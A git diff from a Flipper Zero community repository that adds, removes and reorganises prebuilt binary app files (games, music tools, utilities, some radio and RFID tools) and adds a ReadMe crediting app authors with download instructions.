diff --git a/Applications/Official/STABLE_FW/Tools/Caesar_Cipher.fap b/Applications/Official/STABLE_FW/Tools/Caesar_Cipher.fap
new file mode 100644
index 00000000..31579130
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/Caesar_Cipher.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/Calculator.fap b/Applications/Official/STABLE_FW/Tools/Calculator.fap
new file mode 100644
index 00000000..d1540d0e
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/Calculator.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/Clock.fap b/Applications/Official/STABLE_FW/Tools/Clock.fap
new file mode 100644
index 00000000..fac6eba3
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/Clock.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap b/Applications/Official/STABLE_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap
new file mode 100644
index 00000000..bbbe8a3c
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/ESP8266_IFTTT_Virtual_Button.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/ESP8266_Wifi_Deauther_v2.fap b/Applications/Official/STABLE_FW/Tools/ESP8266_Wifi_Deauther_v2.fap
new file mode 100644
index 00000000..3fa8ea2f
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/ESP8266_Wifi_Deauther_v2.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/MouseJiggler.fap b/Applications/Official/STABLE_FW/Tools/MouseJiggler.fap
new file mode 100644
index 00000000..81325f2d
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/MouseJiggler.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/Multi_Converter.fap b/Applications/Official/STABLE_FW/Tools/Multi_Converter.fap
new file mode 100644
index 00000000..709d741e
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/Multi_Converter.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/Pomodoro_Timer.fap b/Applications/Official/STABLE_FW/Tools/Pomodoro_Timer.fap
new file mode 100644
index 00000000..28047bad
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/Pomodoro_Timer.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/RFID_Fuzzer.fap b/Applications/Official/STABLE_FW/Tools/RFID_Fuzzer.fap
new file mode 100644
index 00000000..fb256485
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/RFID_Fuzzer.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/bt_hid.fap b/Applications/Official/STABLE_FW/Tools/bt_hid.fap
new file mode 100644
index 00000000..95e1abc4
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/bt_hid.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/dap_link.fap b/Applications/Official/STABLE_FW/Tools/dap_link.fap
new file mode 100644
index 00000000..9555c22b
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/dap_link.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/dtmf_dolphin.fap b/Applications/Official/STABLE_FW/Tools/dtmf_dolphin.fap
new file mode 100644
index 00000000..8a930b4c
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/dtmf_dolphin.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/picopass.fap b/Applications/Official/STABLE_FW/Tools/picopass.fap
new file mode 100644
index 00000000..158df955
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/picopass.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/signal_generator.fap b/Applications/Official/STABLE_FW/Tools/signal_generator.fap
new file mode 100644
index 00000000..06d66c62
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/signal_generator.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/spectrum_analyzer.fap b/Applications/Official/STABLE_FW/Tools/spectrum_analyzer.fap
new file mode 100644
index 00000000..fc1aa3df
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/spectrum_analyzer.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/spi_mem_manager.fap b/Applications/Official/STABLE_FW/Tools/spi_mem_manager.fap
new file mode 100644
index 00000000..3ad27c1b
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/spi_mem_manager.fap differ
diff --git a/Applications/Official/STABLE_FW/Tools/weather_station.fap b/Applications/Official/STABLE_FW/Tools/weather_station.fap
new file mode 100644
index 00000000..c7112a31
Binary files /dev/null and b/Applications/Official/STABLE_FW/Tools/weather_station.fap differ
diff --git a/Applications/Official/Tools/barcode_generator.fap b/Applications/Official/Tools/barcode_generator.fap
deleted file mode 100644
index 9f8708af..00000000
Binary files a/Applications/Official/Tools/barcode_generator.fap and /dev/null differ
diff --git a/Applications/Official/Tools/bpm_tapper.fap b/Applications/Official/Tools/bpm_tapper.fap
deleted file mode 100644
index dba3ef77..00000000
Binary files a/Applications/Official/Tools/bpm_tapper.fap and /dev/null differ
diff --git a/Applications/Official/Tools/bt_hid.fap b/Applications/Official/Tools/bt_hid.fap
deleted file mode 100644
index 8a97355b..00000000
Binary files a/Applications/Official/Tools/bt_hid.fap and /dev/null differ
diff --git a/Applications/Official/Tools/clock.fap b/Applications/Official/Tools/clock.fap
deleted file mode 100644
index a4c3d5d1..00000000
Binary files a/Applications/Official/Tools/clock.fap and /dev/null differ
diff --git a/Applications/Official/Tools/dec_hex_converter.fap b/Applications/Official/Tools/dec_hex_converter.fap
deleted file mode 100644
index 0c106c27..00000000
Binary files a/Applications/Official/Tools/dec_hex_converter.fap and /dev/null differ
diff --git a/Applications/Official/Tools/mousejiggler.fap b/Applications/Official/Tools/mousejiggler.fap
deleted file mode 100644
index 924b9a6b..00000000
Binary files a/Applications/Official/Tools/mousejiggler.fap and /dev/null differ
diff --git a/Applications/Official/Tools/multi_converter.fap b/Applications/Official/Tools/multi_converter.fap
deleted file mode 100644
index 635e7bc9..00000000
Binary files a/Applications/Official/Tools/multi_converter.fap and /dev/null differ
diff --git a/Applications/Official/Tools/picopass.fap b/Applications/Official/Tools/picopass.fap
deleted file mode 100644
index 09f1f2ee..00000000
Binary files a/Applications/Official/Tools/picopass.fap and /dev/null differ
diff --git a/Applications/Official/Tools/sentry_safe.fap b/Applications/Official/Tools/sentry_safe.fap
deleted file mode 100644
index 41010c6e..00000000
Binary files a/Applications/Official/Tools/sentry_safe.fap and /dev/null differ
diff --git a/Applications/Official/Tools/spectrum_analyzer.fap b/Applications/Official/Tools/spectrum_analyzer.fap
deleted file mode 100644
index 24c94c20..00000000
Binary files a/Applications/Official/Tools/spectrum_analyzer.fap and /dev/null differ
diff --git a/Applications/Official/Tools/touchtunes.fap b/Applications/Official/Tools/touchtunes.fap
deleted file mode 100644
index ebdf9966..00000000
Binary files a/Applications/Official/Tools/touchtunes.fap and /dev/null differ
diff --git a/Applications/Official/Tools/wav_player.fap b/Applications/Official/Tools/wav_player.fap
deleted file mode 100644
index e6dfa95f..00000000
Binary files a/Applications/Official/Tools/wav_player.fap and /dev/null differ
diff --git a/Applications/ReadMe.md b/Applications/ReadMe.md
index d230df73..5bab20fd 100644
--- a/Applications/ReadMe.md
+++ b/Applications/ReadMe.md
@@ -2,7 +2,7 @@
The long-awaited addition of loading plugins (applications) from the SD card is here thanks to some hard work by the Official Flipper devteam. Anna/hedger released a FAP pack with some pre-built plugins, ready to go. Check out the [Official documentation](https://github.com/flipperdevices/flipperzero-firmware/blob/dev/documentation/AppsOnSDCard.md) for more info.
-And thanks to some further hard work from [xMasterX](https://github.com/xMasterX) of [Unleashed](https://github.com/Eng1n33r/flipperzero-firmware), we now have MORE working applications!
+And thanks to some further hard work from [xMasterX](https://github.com/xMasterX) of [Unleashed](https://github.com/DarkFlippers/unleashed-firmware), we now have MORE working applications!
Since the FAP file needs to be compiled to work with the specific firmware you have, I've separated the FAPs into their respective folders.
**NOTE: Files are interchangeable between RM and UL! They are not interchangeable with Official firmware due to API differences.**
diff --git a/Applications/RogueMaster/GPIO/ESP32_Wifi_Marauder.fap b/Applications/RogueMaster/GPIO/ESP32_Wifi_Marauder.fap
deleted file mode 100644
index 2ec9cdb6..00000000
Binary files a/Applications/RogueMaster/GPIO/ESP32_Wifi_Marauder.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/ESP8266_Deauth.fap b/Applications/RogueMaster/GPIO/ESP8266_Deauth.fap
deleted file mode 100644
index 23aa92b1..00000000
Binary files a/Applications/RogueMaster/GPIO/ESP8266_Deauth.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/ESP8266_Wifi_Deauther.fap b/Applications/RogueMaster/GPIO/ESP8266_Wifi_Deauther.fap
deleted file mode 100644
index 400a989f..00000000
Binary files a/Applications/RogueMaster/GPIO/ESP8266_Wifi_Deauther.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/GPIO_Sentry_Safe.fap b/Applications/RogueMaster/GPIO/GPIO_Sentry_Safe.fap
deleted file mode 100644
index e4d51f4c..00000000
Binary files a/Applications/RogueMaster/GPIO/GPIO_Sentry_Safe.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/Mouse_Jacker.fap b/Applications/RogueMaster/GPIO/Mouse_Jacker.fap
deleted file mode 100644
index 2a4d209f..00000000
Binary files a/Applications/RogueMaster/GPIO/Mouse_Jacker.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/NRF_Sniff.fap b/Applications/RogueMaster/GPIO/NRF_Sniff.fap
deleted file mode 100644
index 0922f0ff..00000000
Binary files a/Applications/RogueMaster/GPIO/NRF_Sniff.fap and /dev/null differ
diff --git a/Applications/RogueMaster/GPIO/Wifi_Scanner.fap b/Applications/RogueMaster/GPIO/Wifi_Scanner.fap
deleted file mode 100644
index 0107e33a..00000000
Binary files a/Applications/RogueMaster/GPIO/Wifi_Scanner.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/2048.fap b/Applications/RogueMaster/Games/2048.fap
deleted file mode 100644
index dc31c4af..00000000
Binary files a/Applications/RogueMaster/Games/2048.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/Arkanoid.fap b/Applications/RogueMaster/Games/Arkanoid.fap
deleted file mode 100644
index 8d8e6512..00000000
Binary files a/Applications/RogueMaster/Games/Arkanoid.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/DOOM.fap b/Applications/RogueMaster/Games/DOOM.fap
deleted file mode 100644
index f154fffb..00000000
Binary files a/Applications/RogueMaster/Games/DOOM.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/Dice.fap b/Applications/RogueMaster/Games/Dice.fap
deleted file mode 100644
index 8f2918fd..00000000
Binary files a/Applications/RogueMaster/Games/Dice.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/FlappyBird.fap b/Applications/RogueMaster/Games/FlappyBird.fap
deleted file mode 100644
index b4ba6cc9..00000000
Binary files a/Applications/RogueMaster/Games/FlappyBird.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/GameOfLife.fap b/Applications/RogueMaster/Games/GameOfLife.fap
deleted file mode 100644
index 7adf5956..00000000
Binary files a/Applications/RogueMaster/Games/GameOfLife.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/Snake.fap b/Applications/RogueMaster/Games/Snake.fap
deleted file mode 100644
index 85c374c5..00000000
Binary files a/Applications/RogueMaster/Games/Snake.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/Tetris.fap b/Applications/RogueMaster/Games/Tetris.fap
deleted file mode 100644
index 4b9e6b7f..00000000
Binary files a/Applications/RogueMaster/Games/Tetris.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/TicTacToe.fap b/Applications/RogueMaster/Games/TicTacToe.fap
deleted file mode 100644
index d374c953..00000000
Binary files a/Applications/RogueMaster/Games/TicTacToe.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/VideoPoker.fap b/Applications/RogueMaster/Games/VideoPoker.fap
deleted file mode 100644
index 6e793815..00000000
Binary files a/Applications/RogueMaster/Games/VideoPoker.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/Zombiez.fap b/Applications/RogueMaster/Games/Zombiez.fap
deleted file mode 100644
index 360b3c73..00000000
Binary files a/Applications/RogueMaster/Games/Zombiez.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/snake_game.fap b/Applications/RogueMaster/Games/snake_game.fap
deleted file mode 100644
index 6d941478..00000000
Binary files a/Applications/RogueMaster/Games/snake_game.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/zBroken_Chess.fap b/Applications/RogueMaster/Games/zBroken_Chess.fap
deleted file mode 100644
index 0c4f4381..00000000
Binary files a/Applications/RogueMaster/Games/zBroken_Chess.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Games/zBroken_Tanks.fap b/Applications/RogueMaster/Games/zBroken_Tanks.fap
deleted file mode 100644
index ee383989..00000000
Binary files a/Applications/RogueMaster/Games/zBroken_Tanks.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Main/Clock.fap b/Applications/RogueMaster/Main/Clock.fap
deleted file mode 100644
index 2a2f1e18..00000000
Binary files a/Applications/RogueMaster/Main/Clock.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Main/ibutton.fap b/Applications/RogueMaster/Main/ibutton.fap
deleted file mode 100644
index 6c320c81..00000000
Binary files a/Applications/RogueMaster/Main/ibutton.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Main/u2f.fap b/Applications/RogueMaster/Main/u2f.fap
deleted file mode 100644
index b3f7b6af..00000000
Binary files a/Applications/RogueMaster/Main/u2f.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/DTMF_Dolphin.fap b/Applications/RogueMaster/Misc/DTMF_Dolphin.fap
deleted file mode 100644
index ea20a88b..00000000
Binary files a/Applications/RogueMaster/Misc/DTMF_Dolphin.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/Multi_Converter.fap b/Applications/RogueMaster/Misc/Multi_Converter.fap
deleted file mode 100644
index 66d835c5..00000000
Binary files a/Applications/RogueMaster/Misc/Multi_Converter.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/UPC_Generator.fap b/Applications/RogueMaster/Misc/UPC_Generator.fap
deleted file mode 100644
index 39c7fbf8..00000000
Binary files a/Applications/RogueMaster/Misc/UPC_Generator.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/music_player.fap b/Applications/RogueMaster/Misc/music_player.fap
deleted file mode 100644
index 0319781e..00000000
Binary files a/Applications/RogueMaster/Misc/music_player.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/uart_echo.fap b/Applications/RogueMaster/Misc/uart_echo.fap
deleted file mode 100644
index 0226e0c5..00000000
Binary files a/Applications/RogueMaster/Misc/uart_echo.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Misc/usb_mouse.fap b/Applications/RogueMaster/Misc/usb_mouse.fap
deleted file mode 100644
index 88837e72..00000000
Binary files a/Applications/RogueMaster/Misc/usb_mouse.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Music/BPM_Tapper.fap b/Applications/RogueMaster/Music/BPM_Tapper.fap
deleted file mode 100644
index 354a6748..00000000
Binary files a/Applications/RogueMaster/Music/BPM_Tapper.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Music/Metronome.fap b/Applications/RogueMaster/Music/Metronome.fap
deleted file mode 100644
index 7d934c93..00000000
Binary files a/Applications/RogueMaster/Music/Metronome.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Music/Music_Player.fap b/Applications/RogueMaster/Music/Music_Player.fap
deleted file mode 100644
index 657cb26c..00000000
Binary files a/Applications/RogueMaster/Music/Music_Player.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Music/Wav_Player.fap b/Applications/RogueMaster/Music/Wav_Player.fap
deleted file mode 100644
index 2ff433a2..00000000
Binary files a/Applications/RogueMaster/Music/Wav_Player.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/BluetoothRemote.fap b/Applications/RogueMaster/Tools/BluetoothRemote.fap
deleted file mode 100644
index 6a0854df..00000000
Binary files a/Applications/RogueMaster/Tools/BluetoothRemote.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/DolphinBackup.fap b/Applications/RogueMaster/Tools/DolphinBackup.fap
deleted file mode 100644
index ae0d8158..00000000
Binary files a/Applications/RogueMaster/Tools/DolphinBackup.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/DolphinRestorer.fap b/Applications/RogueMaster/Tools/DolphinRestorer.fap
deleted file mode 100644
index b6f2102c..00000000
Binary files a/Applications/RogueMaster/Tools/DolphinRestorer.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/RFID_Fuzzer.fap b/Applications/RogueMaster/Tools/RFID_Fuzzer.fap
deleted file mode 100644
index 954d1ce6..00000000
Binary files a/Applications/RogueMaster/Tools/RFID_Fuzzer.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/Spectrum_Analyzer.fap b/Applications/RogueMaster/Tools/Spectrum_Analyzer.fap
deleted file mode 100644
index 283cd463..00000000
Binary files a/Applications/RogueMaster/Tools/Spectrum_Analyzer.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/SubBruteforcer.fap b/Applications/RogueMaster/Tools/SubBruteforcer.fap
deleted file mode 100644
index 02c907a8..00000000
Binary files a/Applications/RogueMaster/Tools/SubBruteforcer.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/SubPlaylist.fap b/Applications/RogueMaster/Tools/SubPlaylist.fap
deleted file mode 100644
index abce86cd..00000000
Binary files a/Applications/RogueMaster/Tools/SubPlaylist.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/bt_hid.fap b/Applications/RogueMaster/Tools/bt_hid.fap
deleted file mode 100644
index 1c298ba8..00000000
Binary files a/Applications/RogueMaster/Tools/bt_hid.fap and /dev/null differ
diff --git a/Applications/RogueMaster/Tools/picopass.fap b/Applications/RogueMaster/Tools/picopass.fap
deleted file mode 100644
index 81dc53c6..00000000
Binary files a/Applications/RogueMaster/Tools/picopass.fap and /dev/null differ
diff --git a/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_IFTTT_Virtual_Button.fap b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_IFTTT_Virtual_Button.fap
new file mode 100644
index 00000000..f8196715
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_IFTTT_Virtual_Button.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_Wifi_Deauther_v2.fap b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_Wifi_Deauther_v2.fap
new file mode 100644
index 00000000..5def44a1
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/ESP8266_Wifi_Deauther_v2.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/GPIO_Extra/flashlight.fap b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/flashlight.fap
new file mode 100644
index 00000000..5536a493
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/GPIO_Extra/flashlight.fap differ
diff --git a/Applications/Unleashed/Games_Extra/game_2048.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/2048.fap
similarity index 95%
rename from Applications/Unleashed/Games_Extra/game_2048.fap
rename to Applications/Unleashed (and RogueMaster)/Games_Extra/2048.fap
index 4ac44c80..029c3f73 100644
Binary files a/Applications/Unleashed/Games_Extra/game_2048.fap and b/Applications/Unleashed (and RogueMaster)/Games_Extra/2048.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Games_Extra/BlackJack.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/BlackJack.fap
new file mode 100644
index 00000000..75a4f734
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Games_Extra/BlackJack.fap differ
diff --git a/Applications/Unleashed/Games_Extra/game_dice.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/Dice.fap
similarity index 57%
rename from Applications/Unleashed/Games_Extra/game_dice.fap
rename to Applications/Unleashed (and RogueMaster)/Games_Extra/Dice.fap
index 5ecec48a..0260b8a4 100644
Binary files a/Applications/Unleashed/Games_Extra/game_dice.fap and b/Applications/Unleashed (and RogueMaster)/Games_Extra/Dice.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Games_Extra/GameOfLife.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/GameOfLife.fap
new file mode 100644
index 00000000..d7af83e0
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Games_Extra/GameOfLife.fap differ
diff --git a/Applications/RogueMaster/Games/MandelbrotSet.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/MandelbrotSet.fap
similarity index 95%
rename from Applications/RogueMaster/Games/MandelbrotSet.fap
rename to Applications/Unleashed (and RogueMaster)/Games_Extra/MandelbrotSet.fap
index 9654cf1c..c198ae16 100644
Binary files a/Applications/RogueMaster/Games/MandelbrotSet.fap and b/Applications/Unleashed (and RogueMaster)/Games_Extra/MandelbrotSet.fap differ
diff --git a/Applications/RogueMaster/Games/MontyHall.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/MontyHall.fap
similarity index 97%
rename from Applications/RogueMaster/Games/MontyHall.fap
rename to Applications/Unleashed (and RogueMaster)/Games_Extra/MontyHall.fap
index 76b4683d..e88557f3 100644
Binary files a/Applications/RogueMaster/Games/MontyHall.fap and b/Applications/Unleashed (and RogueMaster)/Games_Extra/MontyHall.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Games_Extra/Scorched_Tanks.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/Scorched_Tanks.fap
new file mode 100644
index 00000000..e259549f
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Games_Extra/Scorched_Tanks.fap differ
diff --git a/Applications/RogueMaster/Games/TAMA_P1.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/TAMA_P1.fap
similarity index 67%
rename from Applications/RogueMaster/Games/TAMA_P1.fap
rename to Applications/Unleashed (and RogueMaster)/Games_Extra/TAMA_P1.fap
index 926c4eaf..18bb6fa2 100644
Binary files a/Applications/RogueMaster/Games/TAMA_P1.fap and b/Applications/Unleashed (and RogueMaster)/Games_Extra/TAMA_P1.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Games_Extra/Tanks.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/Tanks.fap
new file mode 100644
index 00000000..809b8e83
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Games_Extra/Tanks.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Games_Extra/VideoPoker.fap b/Applications/Unleashed (and RogueMaster)/Games_Extra/VideoPoker.fap
new file mode 100644
index 00000000..072c53b8
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Games_Extra/VideoPoker.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Misc_Extra/Caesar_Cipher.fap b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Caesar_Cipher.fap
new file mode 100644
index 00000000..42ee165c
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Caesar_Cipher.fap differ
diff --git a/Applications/RogueMaster/Misc/Calculator.fap b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Calculator.fap
similarity index 99%
rename from Applications/RogueMaster/Misc/Calculator.fap
rename to Applications/Unleashed (and RogueMaster)/Misc_Extra/Calculator.fap
index d65ddb22..e7056f54 100644
Binary files a/Applications/RogueMaster/Misc/Calculator.fap and b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Calculator.fap differ
diff --git a/Applications/RogueMaster/Misc/MouseJiggler.fap b/Applications/Unleashed (and RogueMaster)/Misc_Extra/MouseJiggler.fap
similarity index 95%
rename from Applications/RogueMaster/Misc/MouseJiggler.fap
rename to Applications/Unleashed (and RogueMaster)/Misc_Extra/MouseJiggler.fap
index 551803a1..185830da 100644
Binary files a/Applications/RogueMaster/Misc/MouseJiggler.fap and b/Applications/Unleashed (and RogueMaster)/Misc_Extra/MouseJiggler.fap differ
diff --git a/Applications/RogueMaster/Misc/Paint.fap b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Paint.fap
similarity index 95%
rename from Applications/RogueMaster/Misc/Paint.fap
rename to Applications/Unleashed (and RogueMaster)/Misc_Extra/Paint.fap
index 19e33aed..c203353f 100644
Binary files a/Applications/RogueMaster/Misc/Paint.fap and b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Paint.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Misc_Extra/Pomodoro_Timer.fap b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Pomodoro_Timer.fap
new file mode 100644
index 00000000..12e61a13
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Misc_Extra/Pomodoro_Timer.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Music_Extra/BPM_Tapper.fap b/Applications/Unleashed (and RogueMaster)/Music_Extra/BPM_Tapper.fap
new file mode 100644
index 00000000..a8c21269
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Music_Extra/BPM_Tapper.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Music_Extra/Music_Beeper.fap b/Applications/Unleashed (and RogueMaster)/Music_Extra/Music_Beeper.fap
new file mode 100644
index 00000000..c8e8d91a
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Music_Extra/Music_Beeper.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Music_Extra/SAM.fap b/Applications/Unleashed (and RogueMaster)/Music_Extra/SAM.fap
new file mode 100644
index 00000000..2d450cca
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Music_Extra/SAM.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Music_Extra/ocarina.fap b/Applications/Unleashed (and RogueMaster)/Music_Extra/ocarina.fap
new file mode 100644
index 00000000..be0431f3
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Music_Extra/ocarina.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/Music_Extra/tuning_fork.fap b/Applications/Unleashed (and RogueMaster)/Music_Extra/tuning_fork.fap
new file mode 100644
index 00000000..d324fbf7
Binary files /dev/null and b/Applications/Unleashed (and RogueMaster)/Music_Extra/tuning_fork.fap differ
diff --git a/Applications/Unleashed (and RogueMaster)/ReadMe.md b/Applications/Unleashed (and RogueMaster)/ReadMe.md
new file mode 100644
index 00000000..a617b8f6
--- /dev/null
+++ b/Applications/Unleashed (and RogueMaster)/ReadMe.md
@@ -0,0 +1,62 @@
+# Flipper Application Files (FAPs) for [Unleashed](https://github.com/DarkFlippers/unleashed-firmware) v8.2 (API v7.x)
+
+## [Download all files including source here](https://uberguidoz.github.io/DownGit/#/home?url=https://github.com/UberGuidoZ/Flipper/tree/main/Applications/Unleashed%20(and%20RogueMaster)) (does not include [bundled apps](https://github.com/DarkFlippers/unleashed-firmware#community-apps-included))
+[They are also hosting a copy of the extra files here](https://github.com/xMasterX/unleashed-extra-pack).
+
+Thank you [xMasterX](https://github.com/xMasterX) for compiling and maintaining these files. I have decided to not include the "integrated/bundled" FAP files that come with a fresh install of Unleashed. If you need to grab a copy of them for whatever reason, you can do so right from the Unleashed repo.
+
+* Visit the [Releases page](https://github.com/DarkFlippers/unleashed-firmware) of the Unleashed repo.
+* Scroll down and download the linked ZIP file from the Assets drop down, under the big install from web link.
+* Within that ZIP, you'll find `resources.tar` - open/extract that too and look in the `apps` folder.
+
+## Thank you to the authors!
+
+The Flipper and its community wouldn't be as rich as it is without your contributions and support. Thank you for all you have done.
+
+## Games
+- [2048 (By OlegSchwann)](https://github.com/OlegSchwann/flipperzero-firmware/tree/hackaton/game_2048/applications/game-2048) [(Score By DevMilanIan)](https://github.com/RogueMaster/flipperzero-firmware-wPlugins/pull/186)
+- [Dice Roller Including SEX/WAR/8BALL/WEED DICE (By RogueMaster)](https://github.com/RogueMaster/flipperzero-firmware-wPlugins/blob/420/applications/dice/dice.c)
+- [Game of Life (Updated to work by tgxn) (By itsyourbedtime)](https://github.com/tgxn/flipperzero-firmware/blob/dev/applications/game_of_life/game_of_life.c)
+- [Mandelbrot Set (By Possibly-Matt)](https://github.com/Possibly-Matt/flipperzero-firmware-wPlugins)
+- [Minesweeper (By panki27)](https://github.com/panki27/minesweeper)
+- [Monty Hall (By DevMilanIan)](https://github.com/RogueMaster/flipperzero-firmware-wPlugins/pull/203)
+- [TAMA P1 (By GMMan)](https://github.com/GMMan/flipperzero-tamagotch-p1) requires [this rom](https://tinyurl.com/tamap1) IN `tama_p1` on SD as `rom.bin` to make it work.
+- [Video Poker (By PixlEmly)](https://github.com/PixlEmly/flipperzero-firmware-testing/blob/420/applications/VideoPoker/poker.c)
+- [Scorched Tanks (By jasniec)](https://github.com/jasniec/flipper-scorched-tanks-game)
+- [Blackjack (By teeebor)](https://github.com/teeebor/flipper_games)
+- [Logic Game 15 (By x27)](https://github.com/x27/flipperzero-game15)
+
+## Music
+- [Software Automatic Mouth aka SAM (By ctoth)](https://github.com/ctoth/SAM)
+- [Tuning Fork (By besya)](https://github.com/besya/flipperzero-tuning-fork)
+- [BPM Tapper (By panki27)](https://github.com/panki27/bpm-tapper)
+- [Ocarina (By invalidna-me)](https://github.com/invalidna-me/flipperzero-ocarina)
+- Music Beeper (By qqMajiKpp / Haseo)
+- Morse Code [(by wh00hw)](https://github.com/wh00hw/MorseCodeFAP)
+
+## GPIO
+- [IFTTT Virtual Button for ESP8266 (By Ferrazzi)](https://github.com/Ferrazzi/FlipperZero_IFTTT_Virtual_Button)
